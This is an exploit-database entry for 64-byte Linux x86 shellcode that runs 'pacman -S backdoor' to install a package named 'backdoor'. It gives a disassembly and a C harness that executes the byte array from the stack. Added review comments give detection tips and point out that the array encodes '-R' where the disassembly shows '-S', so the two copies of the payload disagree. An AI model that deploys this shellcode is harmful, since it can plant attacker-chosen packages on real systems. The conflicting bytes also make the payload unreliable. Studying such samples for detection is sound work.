linux/x86 - pacman -S (default package: backdoor) - 64 bytes

2010-01-24T00:00:00
ID 1337DAY-ID-10172
Type zdt
Reporter Jonathan Salwan
Modified 2010-01-24T00:00:00

Description

Exploit for linux/x86 platform in category shellcode

                                        
==============================================================
Linux i686 - pacman -S <package> (default package: backdoor) - 64 bytes
==============================================================


/*
 Title  : Linux i686 - pacman -S <package> (default package: backdoor) - 64 bytes
 Author : Jonathan Salwan
 
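 Pacman is the package manager developed as part of the Arch Linux distribution.
 This shellcode calls execve on //usr/bin/pacman with the arguments "-S" and
 "backdoor", i.e. it asks pacman to install a package named "backdoor".
 Installing a package normally requires root, so the impact depends on the
 privileges of the process the code runs in. For detection: pacman launched by
 a process that is not a shell or an administration tool is worth alerting on,
 and package transactions are recorded in /var/log/pacman.log by default.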
 
 
 Disassembly of section .text:
 
 08048054 <.text>:
 8048054:   31 c0                   xor    %eax,%eax
 8048056:   31 db                   xor    %ebx,%ebx
 8048058:   31 c9                   xor    %ecx,%ecx
 804805a:   31 d2                   xor    %edx,%edx
 804805c:   31 f6                   xor    %esi,%esi
 804805e:   52                      push   %edx
 804805f:   68 64 6f 6f 72          push   $0x726f6f64  << This is a package
 8048064:   68 62 61 63 6b          push   $0x6b636162  << (backdoor). You can change it.
 8048069:   89 e6                   mov    %esp,%esi
 804806b:   52                      push   %edx
 804806c:   66 68 2d 53             pushw  $0x532d
 8048070:   89 e1                   mov    %esp,%ecx
 8048072:   52                      push   %edx
 8048073:   68 63 6d 61 6e          push   $0x6e616d63
 8048078:   68 6e 2f 70 61          push   $0x61702f6e
 804807d:   68 72 2f 62 69          push   $0x69622f72
 8048082:   68 2f 2f 75 73          push   $0x73752f2f
 8048087:   89 e3                   mov    %esp,%ebx
 8048089:   52                      push   %edx
 804808a:   56                      push   %esi
 804808b:   51                      push   %ecx
 804808c:   53                      push   %ebx
 804808d:   89 e1                   mov    %esp,%ecx
 804808f:   b0 0b                   mov    $0xb,%al
 8048091:   99                      cltd  
 8048092:   cd 80                   int    $0x80
 
 
*/
 
 
#include <stdio.h>
#include <string.h>
 
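/*
 * Test harness for the payload documented in the header comment.
 *
 * Prints the payload length as measured by strlen() (so the figure is only
 * meaningful while the payload contains no NUL byte), then transfers control
 * to the byte array through a function-pointer cast.
 *
 * Returns 0 only if control ever comes back from the call; the listing in
 * the header ends in an execve system call (int $0x80 with %al = 0xb).
 */
int main(void)
{
    char shellcode[] =
        "\x31\xc0\x31\xdb\x31\xc9\x31"
        "\xd2\x31\xf6\x52\x68\x64\x6f"
        "\x6f\x72\x68\x62\x61\x63\x6b"
        /*
         * NOTE(review): the disassembly in the header shows this pushw as
         * 66 68 2d 53 (ASCII "-S"), but the array carries 2d 52 (ASCII "-R").
         * The two copies disagree; the bytes are left exactly as published.
         * Build detection signatures from the bytes actually observed rather
         * than from either copy alone.
         */
        "\x89\xe6\x52\x66\x68\x2d\x52"
        "\x89\xe1\x52\x68\x63\x6d\x61"
        "\x6e\x68\x6e\x2f\x70\x61\x68"
        "\x72\x2f\x62\x69\x68\x2f\x2f"
        "\x75\x73\x89\xe3\x52\x56\x51"
        "\x53\x89\xe1\xb0\x0b\x99\xcd"
        "\x80";

    /* strlen() returns size_t; "%d" was a format/argument mismatch (UB). */
    printf("Length: %zu\n", strlen(shellcode));

    /*
     * NOTE(review): shellcode[] is an automatic array, so this call jumps
     * into stack memory. Where the stack is mapped non-executable (the usual
     * default on current toolchains) the process faults here instead of
     * running the payload.
     */
    ((void (*)(void))shellcode)();

    return 0;
}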


